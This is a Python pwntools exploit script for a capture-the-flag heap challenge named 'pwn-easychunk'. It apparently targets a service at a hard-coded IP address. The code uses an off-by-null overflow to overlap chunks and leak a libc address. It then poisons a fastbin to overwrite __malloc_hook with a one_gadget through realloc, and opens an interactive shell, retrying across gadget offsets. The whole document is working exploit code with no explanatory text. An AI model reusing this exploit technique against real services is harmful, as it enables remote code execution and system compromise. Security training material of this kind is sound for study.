pwn-easychunk (off-by-null)

from pwn import *
def conn():
    """Connect to the challenge service and load the matching libc.

    Binds the module-level names ``r`` (the pwntools tube every helper
    sends through) and ``libc`` (the ELF used for symbol offsets).
    """
    global libc, r
    r = remote("1.95.36.136", 2080)
    libc = ELF("./libc-2.23.so")
def add(x, y):
    """Menu option 1: create an item of size *x* whose body is *y* (bytes).

    Drives the prompts in order through the module-level tube ``r``.
    """
    dialogue = (
        (b"Please Choice!\n", b"1"),
        (b"item:\n", b'aaaa'),
        (b"Please Input Size:\n", str(x)),
        (b"Emo!:\n", y),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def free(x):
    """Menu option 2: release the item at index *x* via the tube ``r``."""
    dialogue = (
        (b"Please Choice!\n", b"2"),
        (b"Please Input index:\n", str(x)),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def edit(x, y):
    """Menu option 3: overwrite the content of index *x* with *y* (bytes)."""
    dialogue = (
        (b"Please Choice!\n", b"3"),
        (b"Please Input index:\n", str(x)),
        (b"Change EMo Content\n", y),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
def show(x):
    """Menu option 4: ask the service to print the content of index *x*.

    The caller is responsible for reading the reply from ``r``.
    """
    dialogue = (
        (b"Please Choice!\n", b"4"),
        (b"index:\n", str(x)),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
    
def pwn(i, j):
    """Run one attempt against the already-connected service.

    ``i`` picks an entry from the one_gadget offset list and ``j`` is added
    to the realloc address written after it.  Relies on the module-level
    ``r`` and ``libc`` bound by ``conn()`` and on the add/free/edit/show
    helpers; ends by handing the tube to the user interactively.
    """
    r.sendlineafter(b"Where are you from?\n", b"hello,everyone.Welcome to: Polar D&N:")
    # Four 0xf8-byte items, then free index 0, rewrite the tail of index 1
    # (0xf0 bytes of filler followed by the 8-byte value 0x200) and free index 2.
    for _ in range(4):
        add(0xf8, b'0')
    free(0)
    edit(1, b'a' * 0xf0 + p64(0x100 + 0x100))
    free(2)
    add(0xf8, b'aaa')
    # Read the 8-byte value the service prints for index 1 after "content:".
    show(1)
    r.recvuntil(b"content:\n")
    leaked = u64(r.recvline(keepends=False).ljust(8, b"\x00"))
    print("main=", hex(leaked))
    # 0x3c4b78 is hard-coded as the distance from the leaked value to the
    # libc base; assumed to hold only for this libc-2.23.so build — TODO confirm.
    libc_base = leaked - 0x3c4b78
    print("base=", hex(libc_base))
    malloc_hook = libc_base + libc.sym["__malloc_hook"]
    one_gadget_offsets = (0x4527a, 0xf03a4, 0xf1247)
    onegadget = libc_base + one_gadget_offsets[i]
    realloc = libc_base + libc.sym["realloc"]
    print("onegadget=", hex(onegadget))
    # Second round with 0x68-byte items; index 1 receives malloc_hook - 0x23.
    add(0x68, b'aaa')
    free(2)
    edit(1, p64(malloc_hook - 0x23))
    add(0x68, b'aaa')
    payload = b'a' * (0x23 - 0x10 - 0x8) + p64(onegadget) + p64(realloc + j)
    add(0x68, payload)
    # gdb.attach(r)
    # Trigger one more allocation, then drop to an interactive session.
    r.sendlineafter(b"Please Choice!\n", b"1")
    r.sendlineafter(b"item:\n", b'aaaa')
    r.interactive()
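# Retry across every one_gadget index and every realloc adjustment until an
# attempt succeeds.  Failures are reported and the tube closed; the original
# bare `except:` also swallowed KeyboardInterrupt/SystemExit (so Ctrl-C could
# not stop the loop) and called r.close() even when conn() had failed before
# `r` was ever bound, which raised NameError.
for i in range(3):
    for j in [0, 2, 4, 6, 8, 10]:
        print(i, j)
        try:
            conn()
            pwn(i, j)
        except Exception as exc:
            print("attempt failed:", exc)
            # conn() may have raised before binding `r`; only close if it exists.
            tube = globals().get("r")
            if tube is not None:
                tube.close()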
